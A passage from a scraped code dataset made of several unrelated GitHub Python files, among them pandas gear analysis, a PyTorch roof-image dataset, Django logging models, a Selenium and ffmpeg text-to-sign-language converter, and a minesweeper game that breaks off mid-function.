'even_H_sel_count'])\n    print(Analy_2)\n\n    ''' 1. Shift gear engagement frequency\n    [Search method]\n    : sort out the regions that are not gN, store the first value, and afterwards store the value at i+1 whenever the index values are not consecutive.\n    '''\n\n    sfcon_odd = AnalySig[(AnalySig['rbm_TTCur']==2) & (AnalySig['gbm_ActGearOdd']!='gN')]\n    sfcon_even = AnalySig[(AnalySig['rbm_TTCur']==2) & (AnalySig['gbm_ActGearEven']!='gN')]\n    odd_shift_change_gear = []\n    even_shift_change_gear = []\n    i=0\n    while i < len(sfcon_odd['gbm_ActGearOdd'])-1:\n        if i==0:\n            odd_shift_change_gear.append(sfcon_odd['gbm_ActGearOdd'].iloc[i])\n        if sfcon_odd.index[i+1] !=sfcon_odd.index[i]+1:\n            odd_shift_change_gear.append(sfcon_odd['gbm_ActGearOdd'].iloc[i+1])\n        i+=1\n\n    i=0\n    while i < len(sfcon_even['gbm_ActGearEven'])-1:\n        if i==0:\n            even_shift_change_gear.append(sfcon_even['gbm_ActGearEven'].iloc[i])\n        if sfcon_even.index[i+1] !=sfcon_even.index[i]+1:\n            even_shift_change_gear.append(sfcon_even['gbm_ActGearEven'].iloc[i+1])\n        i+=1\n\n    odd_shift_change_gear_collection = collections.Counter(odd_shift_change_gear)\n    odd_shift_change_gear_collection = pd.DataFrame.from_dict([odd_shift_change_gear_collection]).T\n\n    even_shift_change_gear_collection = collections.Counter(even_shift_change_gear)\n    even_shift_change_gear_collection = pd.DataFrame.from_dict([even_shift_change_gear_collection]).T\n\n    all_shift_change_gear_collection = pd.concat([odd_shift_change_gear_collection,even_shift_change_gear_collection],axis=0).sort_index(axis=0)\n    all_shift_change_gear_collection.columns=['Shift Gear Change Count']\n    Analy_1 = all_shift_change_gear_collection\n    print(Analy_1)\n\n\n    print(Analy_1.shape[0], type(Analy_1.shape[0]))\n    print(Analy_1.shape[1], type(Analy_1.shape[1]))\n\n\n    Analy = [Analy_1,Analy_2,Analy_3,Analy_4,Analy_6,Analy_7,Analy_8,Analy_9,Analy_10,Analy_12,Analy_13,Analy_14,Analy_15]\n\n    ''' export excel '''\n    fd_environment_Analy = Analy\n\n    return (fd_environment_Analy)","repo_name":"pakgily/diagnosis_2021_0804","sub_path":"fd_environment_210824.py","file_name":"fd_environment_210824.py","file_ext":"py","file_size_in_byte":10924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"12640986013","text":"# 4. Create a list of N elements filled with numbers from the interval [-N, N].\n# Find the product of the elements at the given positions.\n# The positions are stored in the file file.txt, one number per line.\n
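\n# Added worked example (not part of the original homework text): for N = 3 the list is [-3, -2, -1, 0, 1, 2, 3]; if file.txt contains the lines \"1\" and \"5\", the product is (-2) * 2 = -4.\n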
\ndef create_list(number):\n    list_of_numbers = [x for x in range(-number, number + 1)]\n    print(list_of_numbers)\n    multy = 1\n\n    with open('file.txt', 'r') as rn:\n        positions = rn.readlines()\n        for position in positions:\n            position = int(position.replace('\\n', ''))\n            multy *= list_of_numbers[position]\n            print(f'Position => {position}, value => {list_of_numbers[position]}')\n    return multy\n\nn = int(input('Enter a number: '))\nprint(f'Product => {create_list(n)}')\n\n","repo_name":"EkaterinaGaraeva/python_homework2_3","sub_path":"Task004.py","file_name":"Task004.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"18733112558","text":"def solution(s):\n    answer=[]\n    if len(s)==1:\n        return 1\n    else:\n        for i in range(1,len(s)//2+1):\n            text,cnt,idx=\"\",1,0\n            while idx<(len(s)-len(s)%i):\n                if s[idx:idx+i]==s[idx+i:idx+i*2]:\n                    cnt+=1\n                else:\n                    text+=str(\"\" if cnt<=1 else cnt)+s[idx:idx+i]\n                    cnt=1\n                idx+=i\n            text+=s[idx:]\n            answer.append(len(text))\n        return min(answer)\n\n\n\nprint(solution(\"aabbaccc\"))\n","repo_name":"beOk91/programmers","sub_path":"level2/problem60057.py","file_name":"problem60057.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
{"seq_id":"18328818915","text":"import torch\nimport random\nimport torch.utils.data as data\nimport os\nfrom PIL import Image\nimport pandas as pd\nimport numpy as np\n\ndef correct_mask(mask):\n    '''\n    Replace 127 with 0 for cropping purposes\n    '''\n    mask_arr = np.array(mask)\n    mask_arr[mask_arr==127]=0\n    return Image.fromarray(mask_arr)\n\nclass ClassifDataset(data.Dataset):\n    def __init__(self, data_dir,mode = 'df_tagging_roof_material_type',crop_alpha=True, frac = 1, transform=None):\n        \n        def get_df(dirr,frac=frac): \n            df_base = pd.read_csv(dirr+'/''newroof.csv')\n            df = df_base[df_base['fold_mode']==mode]\n            df = df.sample(frac=frac, random_state=1,replace = False)\n            return df\n\n        super(ClassifDataset, self).__init__()\n        self.data_dir = os.path.expanduser(data_dir)\n        self.df = get_df(self.data_dir)\n        self.transform = transform\n        self.crop_alpha = crop_alpha\n        self.classes = ['hippedRoof',\n                        'gabledRoof',\n                        'flatRoof',\n                        'monopitchRoof',\n                        'pyramidalRoof',\n                        'copulaRoof',\n                        'halfHippedRoof',\n                        'archRoof',\n                        'mansardRoof'\n                        ]\n\n    def __getitem__(self, index, color_format='RGB'):\n\n        element = self.df.iloc[index]\n        label_name = element['img_fn']+ '.png'\n        complete_path = os.path.join(self.data_dir,label_name)\n        img_4c = Image.open(complete_path)\n        \n        if self.crop_alpha:\n            alpha = correct_mask(img_4c.getchannel('A'))\n            bbox = alpha.getbbox()\n            img_4cc = img_4c.crop(bbox)\n\n        else:\n            img_4cc = img_4c\n\n\n        img_4cc.load()\n        img = Image.new(color_format, img_4cc.size, (0,0,0))\n        img.paste(img_4cc,mask=img_4cc.split()[3] if self.crop_alpha else None)\n        \n\n        class_str = element['roof_type']\n        class_idx = self.classes.index(class_str)\n        \n        if self.transform is not None:\n            img = self.transform(img)\n        \n        return img,class_idx\n\n    def __len__(self):\n        return self.df.shape[0]\n\n\nif __name__ == '__main__':\n    from transforms import TransformsClassification\n    import matplotlib.pyplot as plt\n    trainset_classif = ClassifDataset('../new_dataset',mode='training',transform = 
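# Added note (commentary, not in the original): correct_mask() above zeroes the 127-valued alpha pixels first, so getbbox() crops to the remaining non-zero (opaque) roof region before the RGB paste in __getitem__.\n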
TransformsClassification(244,'training'), frac = 1.)\n X = torch.zeros((9))\n for i in range(len(trainset_classif)):\n x,y = trainset_classif.__getitem__(i)\n #X[y] +=1/len(trainset_classif)\n plt.imshow(x.permute(1,2,0))\n #plt.title(trainset_classif.classes[y])\n plt.show()\n if i==10:\n break\n print(1/X)","repo_name":"SylvainGavoille/datascience","sub_path":"byol_finetuning/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":2780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20304849806","text":"# import numpy as np\n#\n# arr = np.array([1, 2, 8, 4, 5])\n# value = 0\n#\n# absolute_val_array = np.abs(arr - value)\n# smallest_difference_index = absolute_val_array.argmin()\n# closest_element = arr[smallest_difference_index]\n#\n# print(\"Closest element to\" ,value, \"is:\", closest_element)\n\n# N = 5\n# A = [5,4,1,2,3,9]\n# No = 0\n#\n# new = []\n# A.sort()\n#\n# for items in A:\n# D = abs(items-No )\n# new.append(D)\n#\n# print(new[0])\n\nmylist = [1, 2, 3, 4, 5, 6, 7, 9, 10]\nmynumber = int(input(\"enter num : \"))\n\ndef closest(list, Number):\n temp = []\n for i in list:\n temp.append(abs(Number-i))\n\n return temp.index(min(temp))\n\na = closest(mylist, mynumber)\nprint (\"index is : \",a)\nprint (\"Closet value is : \",mylist[a])","repo_name":"RautelaZone/old_stuff_2021","sub_path":"Python Stuff/Python_Programs/Most Common Programs/ClosestToNumber.py","file_name":"ClosestToNumber.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8280046777","text":"from django import forms\r\nfrom django.db import models \r\nfrom datetime import datetime, date\r\nfrom django.contrib.auth.models import User\r\n\r\nINFO = 1\r\nWARN = 2\r\nFIRE = 3\r\n\r\nSTATUS_CHOICES = (\r\n (INFO, 'Informational'),\r\n (WARN, 'Warning'),\r\n (FIRE, 'Critical'),\r\n)\r\n\r\n# MF_CHOICES display names are available to the templates via \r\n# the helper method as such: {{ object.get_mf_area_display }}\r\nMF_CHOICES = (\r\n (u'ad', u'Adabas'),\r\n (u'br', u'Broker'),\r\n (u'cp', u'Com-plete'),\r\n (u'vp', u'VPS'),\r\n (u'pp', u'PPS'),\r\n (u'pr', u'Printer'),\r\n (u'ot', u'Other'),\r\n)\r\n\r\nclass Log(models.Model): \r\n title = models.CharField(max_length=\"30\",unique=True) \r\n created = models.DateTimeField(default=datetime.now, editable=False)\r\n updated = models.DateTimeField(default=datetime.now, editable=False)\r\n eventTime = models.DateTimeField(default=datetime.now)\r\n notes = models.TextField()\r\n area = models.ForeignKey('Area', verbose_name='Type of log') # This is required as it will help us to group the logs\r\n status = models.IntegerField(choices=STATUS_CHOICES, default=INFO) \r\n alarm = models.ForeignKey('Alarm', blank=True, null=True) # Foreign Key is the alarm which might be associated with this event\r\n facility = models.ForeignKey('Facility', blank=True, null=True, verbose_name='facility area') \r\n created_by = models.ForeignKey(User, editable=False)\r\n mf_area = models.CharField(max_length=2,choices=MF_CHOICES, blank=True, verbose_name='mainframe area')\r\n\r\n def save(self):\r\n if not self.id:\r\n self.created = datetime.today()\r\n self.updated = datetime.today()\r\n super(Log, self).save() \r\n\r\n def __unicode__(self):\r\n return self.notes\r\n\r\nclass Update(models.Model):\r\n\tcreated = models.DateTimeField(default=datetime.now, editable=False)\r\n\tcreated_by = models.ForeignKey(User, 
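# Added usage note (standard Django behaviour, echoing the MF_CHOICES comment above): fields declared with choices get a display helper on instances, e.g.\n#   log.get_status_display()   # -> 'Informational' when status == INFO\n#   log.get_mf_area_display()  # -> 'Adabas' when mf_area == 'ad'\n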
editable=False)\r\n\tnotes = models.TextField()\r\n\tlog = models.ForeignKey('Log', editable=False)\r\n\r\n\r\n# @models.permalink\r\n# def get_absolute_url(self):\r\n# return ('system-display', (), {'object_id': self.id})\r\n\r\nclass Alarm(models.Model):\r\n name = models.CharField(max_length=\"30\",unique=True)\r\n description = models.TextField(blank=True) \r\n\r\n def __unicode__(self):\r\n return self.name\r\n\r\nclass Area(models.Model):\r\n name = models.CharField(max_length=\"30\",unique=True)\r\n description = models.TextField(blank=True) \r\n\r\n def __unicode__(self):\r\n return self.name\r\n\r\nclass Facility(models.Model):\r\n name = models.CharField(max_length=\"30\",unique=True)\r\n description = models.TextField(blank=True) \r\n\r\n def __unicode__(self):\r\n return self.name\r\n\r\nclass AuthorForm(forms.Form):\r\n name = forms.CharField(max_length=100)\r\n title = forms.CharField(max_length=3, widget=forms.Select(choices=STATUS_CHOICES))\r\n choice_field = forms.ChoiceField(widget=forms.RadioSelect, choices=STATUS_CHOICES)\r\n birth_date = forms.DateField(required=False)","repo_name":"Dist-Systems/dclog","sub_path":"dclog/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3083,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"15395847286","text":"#!/usr/bin/env python3\n\nimport ldfutils.connection\nimport ldfutils.dbtypes as lm\nimport ldfutils.dbloader\nimport ldfutils.utils as ut\nimport ldfutils.solutions_processing as sp\nimport sys\nfrom optparse import OptionParser\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ncmd_line_parser = OptionParser()\nldfutils.connection.add_connection_settings_to_option_parser(cmd_line_parser)\n\ncmd_line_parser.add_option(\"-b\", \"--begin\", dest=\"begin_time\", default=\"2014-05-01 00:00:00\",\n help=\"Start time for extracting\", metavar=\"yyyy-mm-dd hh:mm:ss\")\n\ncmd_line_parser.add_option(\"-e\", \"--end\", dest=\"end_time\", default=\"2017-05-01 00:00:00\",\n help=\"End time for extracting\", metavar=\"yyyy-mm-dd hh:mm:ss\")\n\n(cmd_line_options, cmdLineArgs) = cmd_line_parser.parse_args()\n\nsettings = {}\n\nldfutils.connection.setup_connection_settings(\n settings,\n cmd_line_options.connection_settings,\n cmd_line_options.password\n)\n\ntry:\n conn, cursor = ldfutils.connection.create_connection_and_cursor(settings)\n\n print(\"Loading time clusters...\")\n clusters = ldfutils.dbloader.load_time_clusters(\n cursor,\n ut.ConditionGenerator.round_time_interval(cmd_line_options.begin_time, cmd_line_options.end_time)\n )\n\n used_strikes = {}\n total_used_strikes_with_repetition = 0\n\n print(\"Counting used strikes...\")\n for cluster in clusters:\n for strike in cluster.strikes:\n total_used_strikes_with_repetition += 1\n if strike not in used_strikes:\n used_strikes[strike] = 1\n else:\n used_strikes[strike] += 1\n\n unique_strikes = len(used_strikes)\n\n print(\"Unique strikes: \" + str(unique_strikes) + \"; total used: \" + str(total_used_strikes_with_repetition))\n print(\"Part: \" + str(float(unique_strikes)/total_used_strikes_with_repetition))\nfinally:\n cursor.close()\n conn.close()\n","repo_name":"DAlexis/open-lds","sub_path":"legacy/python-processing/test_shared_strikes.py","file_name":"test_shared_strikes.py","file_ext":"py","file_size_in_byte":1920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22565361878","text":"\nfrom rest_framework import serializers\nfrom 
company.models import FuelMaster,Invoice, MeterReading, VatMaster\nfrom shared_tenant.models import Company, Employee\nfrom django.db.models import Q\nfrom shared_tenant.serielizer import EmployeeSerializer\n\n\nclass InvoiceGenerateSerializer(serializers.ModelSerializer):\n\n    class Meta:\n        model = Invoice\n        fields = '__all__'\n        # fields = ('id', 'invoice_no','gross_amt','fuel','qty','type' )\n\n    def save(self):\n        last_invoice = Invoice.objects.filter(Q(type=2) ).order_by('id').last()\n        # Guard: .last() returns None when no invoice exists yet, so only\n        # dereference last_invoice inside the else branch.\n        if not last_invoice:\n            new_invoice_int= 1\n        else:\n            print(\"last invoice\",last_invoice.invoice_no)\n            invoice_no = last_invoice.invoice_no\n            invoice_int = int(invoice_no)\n            new_invoice_int = invoice_int + 1\n\n        print(last_invoice)\n        print(\"New invoice number\",new_invoice_int)\n        print(self.validated_data)\n\n        emp=Employee.objects.get(user=self.context['request'].user)\n\n        invoice = Invoice(\n            **self.validated_data,\n            invoice_no=new_invoice_int,\n            emp = Employee.objects.get(user=self.context['request'].user),\n            company = Company.objects.get(id=emp.company_id) \n        )\n        invoice.save() \n        self.instance = invoice\n        return self.instance\n\n\nclass MeterCreateSerializer(serializers.ModelSerializer):\n    class Meta:\n        model = MeterReading\n        fields = '__all__'\n\n    def save(self):\n        emp=Employee.objects.get(user=self.context['request'].user)\n\n        meter_reading = MeterReading(\n            **self.validated_data,\n            company =Company.objects.get(id=emp.company_id) \n        )\n        meter_reading.save()\n        return meter_reading\n\nclass MeterSerializer(serializers.ModelSerializer):\n    class Meta:\n        model = MeterReading\n        fields = '__all__'\n\n\n","repo_name":"Cilive/skysoft_backend","sub_path":"employee/serielizer.py","file_name":"serielizer.py","file_ext":"py","file_size_in_byte":1955,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
{"seq_id":"22099973047","text":"# Packages\nimport nltk\nnltk.download('punkt')\nfrom nltk import word_tokenize\n#import useless_words\nfrom nltk.stem import PorterStemmer\nimport time\nfrom shutil import copyfile\nfrom difflib import SequenceMatcher\nfrom selenium import webdriver\nimport shutil, sys # for the copyfile\n\nimport shlex\nimport subprocess\nimport os\n#from os import startfile\n\n\n# CONSTANTS \nSIGN_PATH = \"C:\\\\Users\\\\고준원\\\\Downloads\\\\Text_to_sign_language\" ## Your local work folder\n# SIGN_PATH = os.getcwd()\nDOWN_PATH = \"C:\\\\Users\\\\고준원\\\\Downloads\" ## Your local downloads folder\n# DOWN_PATH = os.pardir + '/Results'\n\nDOWNLOAD_WAIT = 7\nSIMILIARITY_RATIO = 0.9\nuselesswords = ['is', 'the', 'are', 'am', 'a', 'it', 'was', 'were', 'an', ',', '.', '?', '!']\n\n# Get words\ndef download_word_sign(word):\n    # Launch the Chrome browser\n    # os.path.abspath(os.getcwd())\n    browser = webdriver.Chrome(os.path.abspath(os.getcwd()) + '/chromedriver') ## Downloaded Chrome driver AT YOUR WORK FOLDER\n    browser.get(\"http://www.aslpro.com/cgi-bin/aslpro/aslpro.cgi\")\n    first_letter = word[0]\n    letters = browser.find_elements_by_xpath('//a[@class=\"sideNavBarUnselectedText\"]')\n    for letter in letters:\n        if first_letter == str(letter.text).strip().lower():\n            letter.click()\n            time.sleep(2)\n            break\n\n    # Show drop down menu ( Spinner )\n    spinner = browser.find_elements_by_xpath(\"//option\")\n    best_score = -1.\n    closest_word_item = None\n    for item in spinner:\n        item_text = item.text\n        # if stem == str(item_text).lower()[:len(stem)]:\n        s = similar(word, str(item_text).lower())\n        if s > best_score:\n            best_score = s\n            closest_word_item = 
item\n            print(word, \" \", str(item_text).lower())\n            print(\"Score: \" + str(s)) \n    if best_score < SIMILIARITY_RATIO:\n        print(word + \" not found in dictionary\")\n        ### HERE\n        ## 1. Alphabet video\n\n        ## 2. Alphabet picture\n        browser.close()\n        return (\"_\" + word.lower())\n    real_name = str(closest_word_item.text).lower()\n\n    print(\"Downloading \" + real_name + \"...\")\n    closest_word_item.click()\n    time.sleep(DOWNLOAD_WAIT)\n    in_path = DOWN_PATH + \"/\" + real_name + \".swf\" ## your local downloads\n    out_path = SIGN_PATH + \"/\" + real_name + \".mp4\"\n    convert_file_format(in_path, out_path)\n    browser.close()\n    return real_name\n\ndef convert_file_format(in_path, out_path):\n    # Converts .swf file to .mp4 file and saves new file at out_path\n    from ffmpy import FFmpeg\n    ## please download ffmpeg AT YOUR WORK FOLDER\n\n    ff = FFmpeg(executable=SIGN_PATH + \"/ffmpeg/bin/ffmpeg.exe\",\n                inputs = {in_path: None},\n                outputs = {out_path: None})\n    ff = FFmpeg(inputs = {in_path: None}, outputs= {out_path: None})\n    ff.run()\n\ndef get_words_in_database():\n    import os\n    vids = os.listdir(SIGN_PATH)\n    vid_names = [v[:-4] for v in vids]\n    return vid_names\n\ndef process_text(text):\n    ##print(\"text here \", text)\n    \n    # Split sentence into words\n    words = word_tokenize(text)\n    ##print(\"token words here\", words)\n\n    # Remove all meaningless words\n    ##print(\"uselesswords : \", uselesswords)\n    usefull_words = [str(w).lower() for w in words if w.lower() not in uselesswords]\n    ##print(\"useless deleted\", usefull_words)\n    \n    return usefull_words\n\ndef merge_signs_first(words):\n    # Write a text file containing all the paths to each video\n    with open(SIGN_PATH + \"/vidlist.txt\", 'w') as f:\n        for w in words:\n            global PLAY_VIDEO\n            if(w != None):\n                f.write(\"file '\" + SIGN_PATH + \"/\" + w + \".mp4'\\n\")\n                PLAY_VIDEO = True\n            elif(w[0] == '_'):\n                for i in range(1, len(w)):\n                    f.write(\"file '\" + SIGN_PATH + \"/\" + w[i] + \".mp4'\\n\")\n                PLAY_VIDEO = True\n            else:\n                PLAY_VIDEO = False\n\n    # Splits the command into pieces in order to feed the command line\n    # command not working, we don't have an output\n    # Command looks like : ffmpeg -f concat -i videolist.txt -c copy output.mp4\n    command = \"ffmpeg -f concat -safe 0 -i vidlist.txt -c copy output.mp4 -y\"\n    \n    args = shlex.split(command)\n    \n    #print(\"@@@ shlex split into\\n\", args, \"\\n\")\n\n    env = {'PATH': SIGN_PATH + '/ffmpeg/bin'}\n    # env = {'PATH': SIGN_PATH + '\\\\ffmpeg\\\\bin' + SIGN_PATH + '\\\\SignToSignLang'} # ffmpeg not recognized\n    # env = os.environ # ffmpeg not recognized\n    # env = {'PATH': os.getenv('PATH')} # ffmpeg not recognized\n    process = subprocess.Popen(args, shell=True, env=env)\n\n    process.wait()\n\n    ## copyfile(src, dst)\n    shutil.copyfile(SIGN_PATH + \"/output.mp4\", SIGN_PATH + \"/outputs.mp4\")\n\ndef merge_signs(words):\n    # Write a text file containing all the paths to each video\n    with open(SIGN_PATH + \"/vidlist.txt\", 'w') as f:\n        for w in words:\n            global PLAY_VIDEO\n            if(w != None):\n                f.write(\"file '\" + SIGN_PATH + \"/\" + w + \".mp4'\\n\")\n                PLAY_VIDEO = True\n            elif(w[0] == '_'):\n                for i in range(1, len(w)):\n                    f.write(\"file '\" + SIGN_PATH + \"/\" + w[i] + \".mp4'\\n\")\n                PLAY_VIDEO = True\n            else:\n                PLAY_VIDEO = False\n\n    # Splits the command into pieces in order to feed the command line\n    # command not working, we don't have an output\n    # Command looks like : ffmpeg -f concat -i videolist.txt -c copy output.mp4\n    command = \"ffmpeg -f concat -safe 0 -i vidlist.txt -c copy output.mp4 -y\"\n    \n    args = shlex.split(command)\n    \n    #print(\"@@@ shlex split into\\n\", args, \"\\n\")\n\n    env = {'PATH': SIGN_PATH + '/ffmpeg/bin'}\n    # env = {'PATH': SIGN_PATH + '\\\\ffmpeg\\\\bin' + SIGN_PATH + '\\\\SignToSignLang'} # ffmpeg not recognized\n    # env = os.environ # ffmpeg not recognized\n    # env = {'PATH': os.getenv('PATH')} # ffmpeg not recognized\n    process = subprocess.Popen(args, shell=True, env=env)\n\n    process.wait()\n    \n    # Now, concat output next to out(which will be a video for whole sentences)\n    command = \"ffmpeg -f concat -safe 0 -i concatoutput.txt -c copy outputs_temp.mp4 -y\"\n    args = shlex.split(command)\n    env = {'PATH': SIGN_PATH + '/ffmpeg/bin'}\n    process = subprocess.Popen(args, shell=True, env=env)\n    process.wait()\n\n    ## copyfile(src, dst)\n    shutil.copyfile(SIGN_PATH + \"/outputs_temp.mp4\", SIGN_PATH + \"/outputs.mp4\")\n\ndef in_database(w):\n    db_list = get_words_in_database()\n    from nltk.stem import PorterStemmer\n    ps = PorterStemmer()\n    s = ps.stem(w)\n    for word in db_list:\n        if s == word[:len(s)]:\n            return True\n    return False\n\ndef similar(a, b):\n    # Returns a decimal representing the similiarity between the two strings.\n    return SequenceMatcher(None, a, b).ratio()\n\ndef find_in_db(w):\n    best_score = -1.\n    best_vid_name = None\n    for v in get_words_in_database():\n        s = similar(w, v)\n        if best_score < s:\n            best_score = s\n            best_vid_name = v\n    if best_score > SIMILIARITY_RATIO:\n        return best_vid_name\n\ndef convert_to_video():\n    ## MAIN STARTS\n    ## Reading the txt file in a for loop from the text-input step makes it possible to run over the whole text.\n    # Get the text which is going to become ASL\n    # f = open(SIGN_PATH + \"\\\\disfluency_remover_result.txt\", 'r')\n    text_path = os.pardir + '/Results/disfluency_remover_result.txt'\n    print(\"text_path\")\n    print(text_path)\n    f = open(text_path, 'r')\n    input_lines = f.readlines()\n    f.close()\n\n    print(\"### Whole text is \", input_lines)\n\n    i = 0\n\n    for text in input_lines:\n        print(\"\\n### Now we are translating [ \" + text +\" ]\")\n\n        # Process text\n        words = process_text(text)\n\n        print(\"words here\", words)\n\n        # Download words that have not been downloaded in previous sessions.\n        print(\"\\n### Check if we already have video in DB\")\n        real_words = []\n        for w in words:\n            real_name = find_in_db(w)\n            if real_name:\n                print(\" ->\" + w + \" is already in db as \" + real_name)\n                real_words.append(real_name)\n            else:\n                real_words.append(download_word_sign(w))\n                if real_words[-1][0] == '_':\n                    word_not_exist = real_words.pop()\n                    # use j here: reusing i would clobber the first-iteration flag of the outer loop\n                    for j in range(1, len(word_not_exist)):\n                        real_words.append(word_not_exist[j])\n\n        words = real_words\n        print(\"### DB check done\\n\")\n\n        # print(\"@@@ What words video gonna merge?\\n\", words, \"\\n\")\n\n        # Concatenate videos and save output video to folder\n        if i == 0:\n            print(\"@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\")\n            merge_signs_first(words)\n            i = 1\n        else:\n            print(\"####################################\")\n            merge_signs(words)\n\n    # Finally make out.mp4\n    shutil.copyfile(SIGN_PATH + \"/outputs.mp4\", SIGN_PATH + \"/out.mp4\")\n\n    # Play the video\n    if PLAY_VIDEO:\n        os.startfile(SIGN_PATH + \"/out.mp4\")\n","repo_name":"jjungkang2/CS470-teamproject","sub_path":"Text_to_sign_language/TextToSignLanguage.py","file_name":"TextToSignLanguage.py","file_ext":"py","file_size_in_byte":9130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"9853683328","text":"data,lookup,pe,commons,framehost,FID=None,None,None,None,None,None\ndef verify():\n    return \"app\"\ndef init(dataV,lookupV):\n    global data,lookup,commons,pe,framehost,FID\n    data = dataV\n    lookup = 
lookupV\n class commonsV():\n icon = data.files + \"reddy/icons/tch.png\"\n window_size = (500,100)\n window_type = 0\n window_pos = (data.mS[0]/2-250,data.mS[1]/2-50)\n title = \"Testing Chaimber!\"\n commons = commonsV\n pe = lookup.get(\"PGE\")\n framehost = lookup.get(\"FHost\")\n FID = framehost.setup(\"tchINFO\", commons)\n return \"tchINFO\", 8, 2\ncalls = 0\ndef draw():\n global calls\n framehost.draw(FID)\n framehost.screen(FID)\n pe.fill.full(pe.color.white)\n pe.text.display(pe.text.make(\"The System modules were restarted!\", 'freesansbold.ttf', 25, pe.math.center((0,0,500,100)), (pe.color.black, None)))\n framehost.exit(FID)\n calls+=1\n if calls >= 100:\n framehost.close(FID)\n data.operations.append(\"run reddy/apps/testingChaimber.py\")","repo_name":"JustRedTTG/REDdyOS","sub_path":"REDdyOS/system/reddy/apps/testingChaimber_resetinfo.py","file_name":"testingChaimber_resetinfo.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"32049500168","text":"import pygame\nclass Text(object):\n def __init__(self, string, color = [255, 255, 255], size = 8, scrollable = False, bold=False):\n ## Render the font into a blittable surface\n if bold:\n self.font = pygame.font.Font('res/fon/bold.ttf', size)\n else:\n self.font = pygame.font.Font('res/fon/font.ttf', size)\n self.color = color\n self.text = string\n self.current = len(string) if not scrollable else 0\n self.scrollable = scrollable\n self.height = self.font.get_height()\n self.renderable = self.font.render(self.text[:self.current], False, self.color)\n self.shadow = self.font.render(self.text[:self.current], False, (38,38,38))\n self.width = self.renderable.get_width()\n\n def draw(self, surface, pos = (0, 0)):\n if self.scrollable:\n ## Blit an animated version of the text\n surface.blit(self.shadow, (pos[0]+1,pos[1]+1))\n surface.blit(self.renderable, pos)\n self.current = min(len(self.text), self.current+1)\n self.update()\n else:\n ## Blit the rendered text at the given position\n surface.blit(self.shadow, (pos[0]-1,pos[1]))\n surface.blit(self.shadow, (pos[0]+1,pos[1]))\n surface.blit(self.shadow, (pos[0],pos[1]+1))\n surface.blit(self.shadow, (pos[0], pos[1]-1))\n surface.blit(self.renderable, pos)\n\n def update(self, string=None, color=[255,255,255]):\n if self.scrollable:\n ## Animated text\n text = self.text[:self.current]\n self.renderable = self.font.render(text, False, (38,38,38))\n self.shadow = self.font.render(text, False, (144,144,144))\n self.width = self.renderable.get_width()\n ## Update the string only if the text is new\n elif string != None and string != self.text:\n self.text = string\n self.renderable = self.font.render(self.text, False, color)\n self.shadow = self.font.render(self.text, False, (38,38,38))\n self.width = self.renderable.get_width()\n","repo_name":"josephnavarro/space-strategy","sub_path":"text.py","file_name":"text.py","file_ext":"py","file_size_in_byte":2125,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"71075308267","text":"import random\n# Board Space object\nclass BoardSpace(object):\n def __init__(self):\n self.status = 0\n self.revealed = False\n\n\n# Board object\nclass Board(object):\n def __init__(self, rows, cols, m_count):\n self.rows = rows\n self.cols = cols\n self.revealedCount = 0\n self.mines = m_count\n self.gameOver = False\n self.gameWon = False\n self.board = [[BoardSpace() for i in range(cols)] for j in 
range(rows)]\n        count = 0\n        while count < m_count:\n            row = random.randint(0, rows - 1)\n            col = random.randint(0, cols - 1)\n            if self.board[row][col].status == -1:\n                continue\n            else:\n                self.addMine(row, col)\n                count += 1\n\n    def __str__(self):\n        # print row by row\n        # first col is empty and always exists\n        result = ''\n        result += '   |'\n        for r in range(self.rows + 1):\n            if r > 0:\n                result += ' ' + str(r-1) + ' |'\n                for i in range(self.cols):\n                    # r is row\n                    # i is col\n                    if self.board[r-1][i].revealed:\n                        result += ' ' + str(self.board[r - 1][i].status) + ' |'\n                    else:\n                        result += '   |'\n            else: \n                for i in range(self.cols):\n                    result += ' ' + str(i) + ' |'\n            result += '\\n'\n            for i in range(self.cols + 1):\n                result += '----'\n            result += '\\n'\n        return result\n\n    def addMine(self, r, c):\n        self.board[r][c].status = -1\n        for row in range(r-1, r+2):\n            for col in range(c-1, c+2):\n                if row >= 0 and row < self.rows and col >= 0 and col < self.cols and self.board[row][col].status != -1:\n                    self.board[row][col].status += 1\n    \n    def chooseSpace(self, r, c):\n        # hit mine\n        if self.board[r][c].status == -1:\n            for row in range(self.rows):\n                for col in range(self.cols):\n                    self.board[row][col].revealed = True\n            self.gameOver = True\n            self.gameWon = False\n            return\n        self.board[r][c].revealed = True\n        self.revealedCount += 1\n        if self.rows * self.cols - self.revealedCount == self.mines:\n            self.gameOver = True\n            self.gameWon = True\n        # if zero space go out\n        if self.board[r][c].status == 0:\n            for row in range(r-1, r+2):\n                for col in range(c-1, c+2):\n                    if row >= 0 and row < self.rows and col >= 0 and col < self.cols and self.board[row][col].revealed == False:\n                        self.chooseSpace(row, col)\n\n# essentially the main function\ndef playGame():\n    # get board size (each prompt re-asks once if the first value is invalid)\n    rowCount = 1\n    colCount = 1\n    try:\n        rowCount = int(input('Please enter number of rows: '))\n        if rowCount <= 0:\n            rowCount = int(input('Please enter number of rows: '))\n        colCount = int(input('Please enter number of columns: '))\n        if colCount <= 0:\n            colCount = int(input('Please enter number of columns: '))\n        